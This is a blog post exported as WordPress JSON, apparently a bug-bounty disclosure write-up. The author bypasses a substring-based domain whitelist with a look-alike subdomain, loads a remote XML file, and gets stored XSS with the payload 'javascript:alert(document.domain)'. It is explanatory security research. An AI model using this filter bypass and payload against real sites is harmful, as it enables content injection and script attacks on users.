{"id":156,"date":"2022-08-14T13:43:53","date_gmt":"2022-08-14T11:43:53","guid":{"rendered":"https:\/\/bergee.it\/blog\/?p=156"},"modified":"2022-09-07T09:08:15","modified_gmt":"2022-09-07T07:08:15","slug":"url-filter-bypass-rfi-and-xss","status":"publish","type":"post","link":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/","title":{"rendered":"URL filter bypass, RFI and XSS"},"content":{"rendered":"<p>In this story, I tell you how I was able to bypass the URL filtering rule to inject my own files into the server and eventually obtain stored XSS. As I can&#8217;t reveal the target let&#8217;s call it redacted.com. Using <a href=\"https:\/\/github.com\/tomnomnom\/waybackurls\" target=\"_blank\" rel=\"noopener\">waybackurls<\/a> on the target I found the following URL:<\/p>\n<blockquote class=\"wrapped\"><p>http:\/\/emp.redacted.com\/embed.html?playlist=https:\/\/playlists.redacted.com\/sport\/0\/football\/34232917A\/playlist.sxml<\/p><\/blockquote>\n<p>The playlist parameter was the URL to the XML file that delivered the data to render by the site. I immediately thought of injecting my own URL there. I tried but it only accepted the URL from *.redacted.com.\u00a0 After some trials and errors, I successfully bypassed the filter. It accepted the url from *.redacted.com.myowndomain.com. The filter did not check if the string is properly ended, it checked if the whitelisted domain is within the given domain of the remote URL. I had my own domain berdzi.tk. This way I registered the subdomain like this:<\/p>\n<blockquote><p>redacted.com.berdzi.tk<\/p><\/blockquote>\n<p>ran my own server, put there my modified XML file there and put this url into browser:<\/p>\n<blockquote class=\"wrapped\"><p>http:\/\/emp.redacted.com\/embed.html?playlist=http:\/\/playlists.redacted.com.berdzi.tk\/playlist.xml<\/p><\/blockquote>\n<p>My own playlist data were rendered properly. I obtained <em>Remote File Inclusion<\/em><strong>.<\/strong> There were some placeholders in XML I could change but it didn&#8217;t do anything malicious. Suddenly I noticed the URL to the main site of redacted.com in the corner. And this URL was placed inside the XML file. If I changed it, I get <em>Open Redirect<\/em>, however open redirect is not really dangerous. Fortunately there is a payload that allows to transform open redirect into XSS:<\/p>\n<blockquote><p>javascript:alert(document.domain)<\/p><\/blockquote>\n<p>I put it into the XML and I obtained <strong>stored XSS.\u00a0<\/strong>It required user&#8217;s interaction, though. But it was fully functional stored XSS which I was proud of and could attack anoter users with it.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-158 size-large\" src=\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-1024x789.jpg\" alt=\"\" width=\"640\" height=\"493\" srcset=\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-1024x789.jpg 1024w, https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-300x231.jpg 300w, https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-768x592.jpg 768w, https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-850x655.jpg 850w, https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted.jpg 1330w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/p>\n<p>Reward: \ud83d\udc55<\/p>\n<p>See you next bug \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this story, I tell you how I was able to bypass the URL filtering rule to inject my own files into the server and eventually obtain stored XSS. As I can&#8217;t reveal the target let&#8217;s call it redacted.com. Using waybackurls on the target I found the following URL: http:\/\/emp.redacted.com\/embed.html?playlist=https:\/\/playlists.redacted.com\/sport\/0\/football\/34232917A\/playlist.sxml The playlist parameter was the&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,33,29],"tags":[],"class_list":["post-156","post","type-post","status-publish","format-standard","hentry","category-bez-kategorii","category-vdp","category-write-up"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>URL filter bypass, RFI and XSS - Bergee&#039;s Stories on Bug Hunting<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"URL filter bypass, RFI and XSS - Bergee&#039;s Stories on Bug Hunting\" \/>\n<meta property=\"og:description\" content=\"In this story, I tell you how I was able to bypass the URL filtering rule to inject my own files into the server and eventually obtain stored XSS. As I can&#8217;t reveal the target let&#8217;s call it redacted.com. Using waybackurls on the target I found the following URL: http:\/\/emp.redacted.com\/embed.html?playlist=https:\/\/playlists.redacted.com\/sport\/0\/football\/34232917A\/playlist.sxml The playlist parameter was the...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/\" \/>\n<meta property=\"og:site_name\" content=\"Bergee&#039;s Stories on Bug Hunting\" \/>\n<meta property=\"article:published_time\" content=\"2022-08-14T11:43:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-09-07T07:08:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-1024x789.jpg\" \/>\n<meta name=\"author\" content=\"bergee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/bergee\" \/>\n<meta name=\"twitter:site\" content=\"@bergee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"bergee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/\"},\"author\":{\"name\":\"bergee\",\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"headline\":\"URL filter bypass, RFI and XSS\",\"datePublished\":\"2022-08-14T11:43:53+00:00\",\"dateModified\":\"2022-09-07T07:08:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/\"},\"wordCount\":334,\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-1024x789.jpg\",\"articleSection\":[\"Bez kategorii\",\"vdp\",\"write-up\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/\",\"url\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/\",\"name\":\"URL filter bypass, RFI and XSS - Bergee&#039;s Stories on Bug Hunting\",\"isPartOf\":{\"@id\":\"https:\/\/bergee.it\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-1024x789.jpg\",\"datePublished\":\"2022-08-14T11:43:53+00:00\",\"dateModified\":\"2022-09-07T07:08:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#primaryimage\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted.jpg\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted.jpg\",\"width\":1330,\"height\":1025},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/bergee.it\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"URL filter bypass, RFI and XSS\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/bergee.it\/blog\/#website\",\"url\":\"https:\/\/bergee.it\/blog\/\",\"name\":\"Bergee&#039;s Stories on Bug Hunting\",\"description\":\"hacking, cyber security and programming\",\"publisher\":{\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/bergee.it\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73\",\"name\":\"bergee\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"url\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"contentUrl\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\",\"width\":129,\"height\":150,\"caption\":\"bergee\"},\"logo\":{\"@id\":\"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png\"},\"sameAs\":[\"http:\/\/localhost\/wordpress\",\"https:\/\/www.linkedin.com\/in\/bartlomiej-bergier\",\"https:\/\/x.com\/https:\/\/twitter.com\/bergee\"],\"url\":\"https:\/\/bergee.it\/blog\/author\/bergee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"URL filter bypass, RFI and XSS - Bergee&#039;s Stories on Bug Hunting","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/","og_locale":"en_US","og_type":"article","og_title":"URL filter bypass, RFI and XSS - Bergee&#039;s Stories on Bug Hunting","og_description":"In this story, I tell you how I was able to bypass the URL filtering rule to inject my own files into the server and eventually obtain stored XSS. As I can&#8217;t reveal the target let&#8217;s call it redacted.com. Using waybackurls on the target I found the following URL: http:\/\/emp.redacted.com\/embed.html?playlist=https:\/\/playlists.redacted.com\/sport\/0\/football\/34232917A\/playlist.sxml The playlist parameter was the...","og_url":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/","og_site_name":"Bergee&#039;s Stories on Bug Hunting","article_published_time":"2022-08-14T11:43:53+00:00","article_modified_time":"2022-09-07T07:08:15+00:00","og_image":[{"url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-1024x789.jpg","type":"","width":"","height":""}],"author":"bergee","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/bergee","twitter_site":"@bergee","twitter_misc":{"Written by":"bergee","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#article","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/"},"author":{"name":"bergee","@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"headline":"URL filter bypass, RFI and XSS","datePublished":"2022-08-14T11:43:53+00:00","dateModified":"2022-09-07T07:08:15+00:00","mainEntityOfPage":{"@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/"},"wordCount":334,"publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"image":{"@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-1024x789.jpg","articleSection":["Bez kategorii","vdp","write-up"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/","url":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/","name":"URL filter bypass, RFI and XSS - Bergee&#039;s Stories on Bug Hunting","isPartOf":{"@id":"https:\/\/bergee.it\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#primaryimage"},"image":{"@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#primaryimage"},"thumbnailUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted-1024x789.jpg","datePublished":"2022-08-14T11:43:53+00:00","dateModified":"2022-09-07T07:08:15+00:00","breadcrumb":{"@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#primaryimage","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted.jpg","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/domain_filter_bypass_redacted.jpg","width":1330,"height":1025},{"@type":"BreadcrumbList","@id":"https:\/\/bergee.it\/blog\/url-filter-bypass-rfi-and-xss\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/bergee.it\/blog\/"},{"@type":"ListItem","position":2,"name":"URL filter bypass, RFI and XSS"}]},{"@type":"WebSite","@id":"https:\/\/bergee.it\/blog\/#website","url":"https:\/\/bergee.it\/blog\/","name":"Bergee&#039;s Stories on Bug Hunting","description":"hacking, cyber security and programming","publisher":{"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/bergee.it\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/bergee.it\/blog\/#\/schema\/person\/a37382384cc58e596119b1eec4869d73","name":"bergee","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","url":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","contentUrl":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png","width":129,"height":150,"caption":"bergee"},"logo":{"@id":"https:\/\/bergee.it\/blog\/wp-content\/uploads\/2022\/08\/berdzi_drawing_150x150_x.png"},"sameAs":["http:\/\/localhost\/wordpress","https:\/\/www.linkedin.com\/in\/bartlomiej-bergier","https:\/\/x.com\/https:\/\/twitter.com\/bergee"],"url":"https:\/\/bergee.it\/blog\/author\/bergee\/"}]}},"_links":{"self":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/156","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/comments?post=156"}],"version-history":[{"count":7,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/156\/revisions"}],"predecessor-version":[{"id":178,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/posts\/156\/revisions\/178"}],"wp:attachment":[{"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/media?parent=156"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/categories?post=156"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bergee.it\/blog\/wp-json\/wp\/v2\/tags?post=156"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}